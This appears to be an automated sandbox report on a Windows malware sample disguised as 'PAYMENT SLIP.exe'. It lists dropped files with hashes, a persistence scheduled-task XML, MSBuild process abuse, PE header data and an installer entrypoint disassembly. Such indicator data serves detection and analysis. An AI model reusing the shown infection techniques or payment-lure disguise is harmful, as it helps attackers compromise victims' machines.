            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\MSBuild.exe.log
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):325
            Entropy (8bit):5.334380084018418
            Encrypted:false
            SSDEEP:6:Q3LadLCR22IAQykdL1tZbLsbFLIP12MUAvvro6ysGMFLIP12MUAvvrs:Q3LaJU20NaL1tZbgbe4MqJsGMe4M6
            MD5:65CE98936A67552310EFE2F0FF5BDF88
            SHA1:8133653A6B9A169C7496ADE315CED322CFC3613A
            SHA-256:682F7C55B1B6E189D17755F74959CD08762F91373203B3B982ACFFCADE2E871A
            SHA-512:2D00AC024267EC384720A400F6D0B4F7EDDF49FAF8AB3C9E6CBFBBAE90ECADACA9022B33E3E8EC92E4F57C7FC830299C8643235EB4AA7D8A6AFE9DD1775F57C3
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
            C:\Users\user\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll
            Process:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................PE..L.....`...........!......................... ...............................@.......................................%..K.... ....................................................................................... ...............................text............................... ..`.rdata..+.... ......................@..@.data...&....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsd2D5A.tmp
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            Preview: ........,.......................d.......4...................................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................PE..L.....`...........!......................... ...............................@.......................................%..K.... ....................................................................................... ...............................text............................... ..`.rdata..+.... ......................@..@.data...&....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsiFB00.tmp\qm1tw12xr.dll
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................PE..L.....`...........!......................... ...............................@.......................................%..K.... ....................................................................................... ...............................text............................... ..`.rdata..+.... ......................@..@.data...&....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsj3D87.tmp\qm1tw12xr.dll
            Process:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................PE..L.....`...........!......................... ...............................@.......................................%..K.... ....................................................................................... ...............................text............................... ..`.rdata..+.... ......................@..@.data...&....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsj62B2.tmp
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            Preview: ........,.......................d.......4...................................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsmD249.tmp
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            Preview: ........,.......................d.......4...................................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsnFAD0.tmp
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            Preview: ........,.......................d.......4...................................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsq1C23.tmp
            Process:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            Preview: ........,.......................d.......4...................................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsy2D8A.tmp\qm1tw12xr.dll
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................PE..L.....`...........!......................... ...............................@.......................................%..K.... ....................................................................................... ...............................text............................... ..`.rdata..+.... ......................@..@.data...&....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsz3D48.tmp
            Process:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            Preview: ........,.......................d.......4...................................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\nsz6311.tmp\qm1tw12xr.dll
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................PE..L.....`...........!......................... ...............................@.......................................%..K.... ....................................................................................... ...............................text............................... ..`.rdata..+.... ......................@..@.data...&....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\p7nih0ok4yeyw5j9l
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):9733
            Entropy (8bit):7.976610510872038
            Encrypted:false
            SSDEEP:192:ttSk8it38myV0RlyqF61GDX8uuU078l07Ie73nOblxXLz7gUZW3E:/+UMmlzdjsv7CMz3ALzUl0
            MD5:B312481DDB4D93F427F4BFE952EC032F
            SHA1:A035A4ABF6D941F61F1427791B0121A4B400DB20
            SHA-256:E49684274A30B245C813044704EC5E9F4EB63163B6F0D18A969F5EC455240A2E
            SHA-512:E7697534D567B978BF4AD8AB015B3EA0CD39DC9A7EBF0DC77AF01075B797696895A8A4D5D52F834EC60DB877230353C99A7CD732AF023120079F1D3A889F513C
            Malicious:false
            Preview: )....... ....=...A.*.......itE eJyOy....1..q.n.*...u..=!{~.....Z#..R....{..Up....54o.........$.../2e..<._j....0.J1m.z;>.N....t...\ev....FI.....x.t7......!b.......[!$'....1,U..T.g.cP[.... ..!^.I.-...8...Dx{~..e.~69.J...w...w..x..2..X...&._+...#.~...%......S.._=@..........z'.K..hkn.z.\zu....9.3j."G.z...%..svIE.?..N.....Hmt..6...QN...0-0S.|...X.a../;f....,5.M......=.[G..DG*..r..q.be...0.T..psv....B}...%B....*...B.:..-I...P.t..W.....f6......|....8..4..H.aI....._.vD.....s.....^a..*l"......Oz.......~.....9<?..%.ID...l.|C..s....7..8v.r...Uj...k....=D..eOR...[.......O.iP..Y[^.mz.>.7SBY....4....5.e..+.c./........:&^...)*m.hu..t..8^3*..buvy.C.8%..$%(E....-.ABE...d0L.OPS..._ZK.....9...{|...........K.d......T....2...v.....l...#o%c.....}T!...........>?B..(..GUklo....v...:7.ky............4=D.\.H.B9V.Z=..N[.[R.l.,.........sG}.....<._.o...(T..,K.M.eAQP......%..........,..K.2......<.$.....:.....&'*.F.../`ST....f........a.......;....}~...h@-.H...M...;.
            C:\Users\user\AppData\Local\Temp\tmp3E70.tmp
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1320
            Entropy (8bit):5.136963558289723
            Encrypted:false
            SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnc2xtn:cbk4oL600QydbQxIYODOLedq3ZLj
            MD5:AE766004C0D8792953BAFFFE8F6A2E3B
            SHA1:14B12F27543A401E2FE0AF8052E116CAB0032426
            SHA-256:1ABDD9B6A6B84E4BA1AF1282DC84CE276C59BA253F4C4AF05FEA498A4FD99540
            SHA-512:E530DA4A5D4336FC37838D0E93B5EB3804B9C489C71F6954A47FC81A4C655BB72EC493E109CF96E6E3617D7623AC80697AD3BBD5FFC6281BAFC8B34DCA5E6567
            Malicious:true
            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
            C:\Users\user\AppData\Local\Temp\yj86kat5ru4v3qtvudmb
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):207872
            Entropy (8bit):7.998917498661265
            Encrypted:true
            SSDEEP:6144:j7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1TN:cOnSY3A807r8AZFz1UNN
            MD5:C9F8BAE9DBB880A3C8D3100855E94065
            SHA1:2F66D8691CD7E33C7F5026DD7DB102FAFD664C7B
            SHA-256:913B0E52C651B9BE1F4FA52EFCBC9FBE6471B805A9AD27D8DDC6FB5286D330E6
            SHA-512:797E0D7E5D502332A049816F1AAE2C17060698C11432C0639079D0F16C7C2DB3F9B3A9F07A101729723C621A8A3D96972A164768126990A73FF0D01DC255EA6C
            Malicious:false
            Preview: VG$....(.Y..e.C.6J.........Q..=.42..(..| >.`4...d......S+v._."......o./e.S......y7....J.Y.n3.?..hu..n.GB3.5YND...1.Z..p.h5.5...or."R..:.;.o.-.&5.W...VG.yX.+.PM...J....B....R.b....H?.l.......{.......N*.v...... .....o:..........qr...y....p~....yP.Y..d\.n.._..!...IE.VI*.....{v..>.%%...L..;^.(l8......jY..)..9Gw...S...7e........JLC...{...|XA.u.|.......I..\T.#........Zq..=.z.w.L;......../..R.%%7.jl.|C..jb..;ZcS..t..Gv..0.BK.|H.........q...7j..C.3?.6..b......D...G>...\FSX,.\9.|=.....AY..N.........Ir.R....9...K...,.<....;@aQpL....V.#.iU......q.z..F8.p5E..8.i........z%.T.P....,xv....z..WV..e..s....WB....B5....[....:d.=.V.P&7:....E......N.?.-..Ol..E....k.......j.[v..[..i..<3.A.....(-.a..Tq&..b.c)..=wFim..r.a.h.<..~..@P....4.t....5n..>...8....1.....q.P ...........6..w..2.Z~.vv.......:.I_m~V$..8S..Ce.g.$z.n....y... &.%'J.....A.....m.=:D[L..O..7....o.....N...b..F.P@.'..Mq@....].A'",'.zyP=....o.v.S...........`;.4.xZH.-7..h.J/....Pt........qT...
            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:data
            Category:dropped
            Size (bytes):1856
            Entropy (8bit):7.089541637477408
            Encrypted:false
            SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhL
            MD5:30D23CC577A89146961915B57F408623
            SHA1:9B5709D6081D8E0A570511E6E0AAE96FA041964F
            SHA-256:E2130A72E55193D402B5F43F7F3584ECF6B423F8EC4B1B1B69AD693C7E0E5A9E
            SHA-512:2D5C5747FD04F8326C2CC1FB313925070BC01D3352AFA6C36C167B72757A15F58B6263D96BD606338DA055812E69DDB628A6E18D64DD59697C2F42D1C58CC687
            Malicious:false
            Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:International EBCDIC text, with NEL line terminators
            Category:dropped
            Size (bytes):8
            Entropy (8bit):3.0
            Encrypted:false
            SSDEEP:3:bAt:U
            MD5:C2A50EDC6F6D3A2C5183544FFC6B36FE
            SHA1:41213577BDE2E7AD795F79D2747EA7B4FEBE44B7
            SHA-256:1105EDFF279035C252F149FAD0058E533177E1C4CD1525278187C168572D8A9B
            SHA-512:01C57FEEAE764B4541AF6078BFDB3C2C4599DC2E2063279507AA84B7C0DB11771E504A6437A8848B0EF30AB8BA3D2A10A4E06C4354DF8184BD8C6156E1413FCC
            Malicious:true
            Preview: \N..K..H
            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):57
            Entropy (8bit):4.85263908467479
            Encrypted:false
            SSDEEP:3:oMty8WbSI1u:oMLWuI1u
            MD5:A35128E4E28B27328F70E4E8FF482443
            SHA1:B89066B2F8DB34299AABFD7ABEE402D5444DD079
            SHA-256:88AEA00733DC4B570A29D56A423CC5BF163E5ACE7AF349972EB0BBA8D9AD06E1
            SHA-512:F098E844B5373B34642B49B6E0F2E15CFDAA1A8B6CABC2196CEC0F3765289E5B1FD4AB588DD65F97C8E51FA9A81077621E9A06946859F296904C646906A70F33
            Malicious:false
            Preview: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Category:dropped
            Size (bytes):259286
            Entropy (8bit):7.914777825531565
            Encrypted:false
            SSDEEP:6144:kgORaiLT/dr9odWD2AHR5onxnn/UHDV8m0RjPwCytV:kgmLT/vodYR5gnn/i0RjPjc
            MD5:50C9D58F61950484825D85A9A1372A7D
            SHA1:79DF49A23AF28B6322F1FA461167B1145FC927DE
            SHA-256:80726D3E380E4A7D0D1EEE7F352C4A319E70DD4355A1A4F02AB27BABC1A13D15
            SHA-512:AC470694F9CA70CF8EB1A87604AE03E9F521FA413AA2D78F411AF4B7F60BC8CF346C2C69F30E083AA6F34E32041012F295DCF6BDAD378E1A2A8CD6D2E9FC066D
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 43%
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.......5............@.......................................@.............................................P............................................................................................................text...re.......f.................. ..`.rdata...............j..............@..@.data...x............~..............@....ndata...................................rsrc...P...........................@..@................................................................................................................................................................................................................................................................................................................................................
            \Device\ConDrv
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):235
            Entropy (8bit):5.107306146099542
            Encrypted:false
            SSDEEP:6:zx3M1tlAX8bSWR30qysGMQbSVRRZBXVRbJ0fFPRAgRYan:zK1XnV30ZsGMIG9BFRbQ5AUYan
            MD5:67DDD8252A246E7B14649B0063E351C0
            SHA1:AAE1C6839D1CC4A626D0FB2D4773823AD209FA17
            SHA-256:24C8283BA3F7FCA2E4CEF6F141263DD1E8A36E5A5CD96A97BFE83525D7663116
            SHA-512:326A5E0A440F60D4808C91499F1F3616C496B67DC053B4A2A40B0FE09002074AE5365018781F8746E98E7E3CFCD35F1310D17FB7C2138A8157318E6791987025
            Malicious:false
            Preview: Microsoft (R) Build Engine Version 2.0.50727.8922..[Microsoft .NET Framework, Version 2.0.50727.8922]..Copyright (C) Microsoft Corporation 2005. All rights reserved.....MSBUILD : error MSB1009: Project file does not exist...Switch: 0..

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Entropy (8bit):7.914777825531565
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:PAYMENT SLIP.exe
            File size:259286
            MD5:50c9d58f61950484825d85a9a1372a7d
            SHA1:79df49a23af28b6322f1fa461167b1145fc927de
            SHA256:80726d3e380e4a7d0d1eee7f352c4a319e70dd4355a1a4f02ab27babc1a13d15
            SHA512:ac470694f9ca70cf8eb1a87604ae03e9f521fa413aa2d78f411af4b7f60bc8cf346c2c69f30e083aa6f34e32041012f295dcf6bdad378e1a2a8cd6d2e9fc066d
            SSDEEP:6144:kgORaiLT/dr9odWD2AHR5onxnn/UHDV8m0RjPwCytV:kgmLT/vodYR5gnn/i0RjPjc
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....

            File Icon

            Icon Hash:b2a88c96b2ca6a72

            Static PE Info

            General

            Entrypoint:0x4035d8
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x5F24D702 [Sat Aug 1 02:44:18 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:c05041e01f84e1ccca9c4451f3b6a383

            Entrypoint Preview

            Instruction
            sub esp, 000002D4h
            push ebx
            push esi
            push edi
            push 00000020h
            pop edi
            xor ebx, ebx
            push 00008001h
            mov dword ptr [esp+14h], ebx
            mov dword ptr [esp+10h], 0040A230h
            mov dword ptr [esp+1Ch], ebx
            call dword ptr [004080C8h]
            call dword ptr [004080CCh]
            and eax, BFFFFFFFh
            cmp ax, 00000006h
            mov dword ptr [0042A26Ch], eax
            je 00007FBFD4F753F3h
            push ebx
            call 00007FBFD4F786F9h
            cmp eax, ebx
            je 00007FBFD4F753E9h
            push 00000C00h
            call eax
            mov esi, 004082B0h
            push esi
            call 00007FBFD4F78673h
            push esi
            call dword ptr [00408154h]
            lea esi, dword ptr [esi+eax+01h]
            cmp byte ptr [esi], 00000000h
            jne 00007FBFD4F753CCh
            push 0000000Bh
            call 00007FBFD4F786CCh
            push 00000009h
            call 00007FBFD4F786C5h
            push 00000007h
            mov dword ptr [0042A264h], eax
            call 00007FBFD4F786B9h
            cmp eax, ebx
            je 00007FBFD4F753F1h
            push 0000001Eh
            call eax
            test eax, eax
            je 00007FBFD4F753E9h
            or byte ptr [0042A26Fh], 00000040h
            push ebp
            call dword ptr [00408038h]
            push ebx
            call dword ptr [00408298h]
            mov dword ptr [0042A338h], eax
            push ebx
            lea eax, dword ptr [esp+34h]
            push 000002B4h
            push eax
            push ebx
            push 00421708h
            call dword ptr [0040818Ch]
            push 0040A384h

            Rich Headers

            Programming Language:
            • [EXP] VC++ 6.0 SP5 build 8804

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
